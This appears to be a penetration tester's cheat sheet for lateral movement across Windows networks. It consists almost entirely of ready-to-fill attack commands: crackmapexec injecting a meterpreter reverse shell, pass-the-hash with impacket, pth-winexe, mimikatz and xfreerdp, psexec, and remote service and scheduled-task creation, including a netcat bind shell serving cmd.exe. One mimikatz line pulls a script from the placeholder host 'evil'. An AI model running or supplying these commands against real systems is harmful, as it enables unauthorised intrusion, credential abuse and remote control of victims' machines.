Lateral movements



set payload windows/meterpreter/reverse_https
crackmapexec <ip> -u <user> -p <password> -d <domain> -M metinject –o LHOST=<ip> LPORT=<port>


Use -x for cmd command and -X for powershell command
It works just fine combined with a psh-cmd

crackmapexec <ip> -u <user> -p <password> -d <domain> -<x/X> <command>


If NTML only you can add padding:

crackmapexec <ip> -u <user> -H "<lm>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:"\"<C:\Program Files\Internet Explorer\IEXPLORE.EXE\>" <http://evil/f.ps1>"
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
.\psexec64.exe \\<ip> -u .\<administrator> -p <password> cmd.exe
use exploit/windows/smb/psexec

Remote invoke executable

From attacker machine

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Dodging the 30-second dilemma

sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Verify that the Schedule service is running and start it if not

sc \\<targetip> query schedule
sc \\<targetip> start schedule

3. Check the current local time on the target machine

net time \\<targetip>

4. Schedule the job

schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>
at \\<targetip> <HH:MM> <A/P> <command>

5. Verify the job status

schtasks /query /s <targetip>
at \\<targetip>

wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>
From compromised machine

Not tested


Target another machine using the credentials of the compromised host

run schtasksabuse -c "<command1>(,command2)" -t <targetip>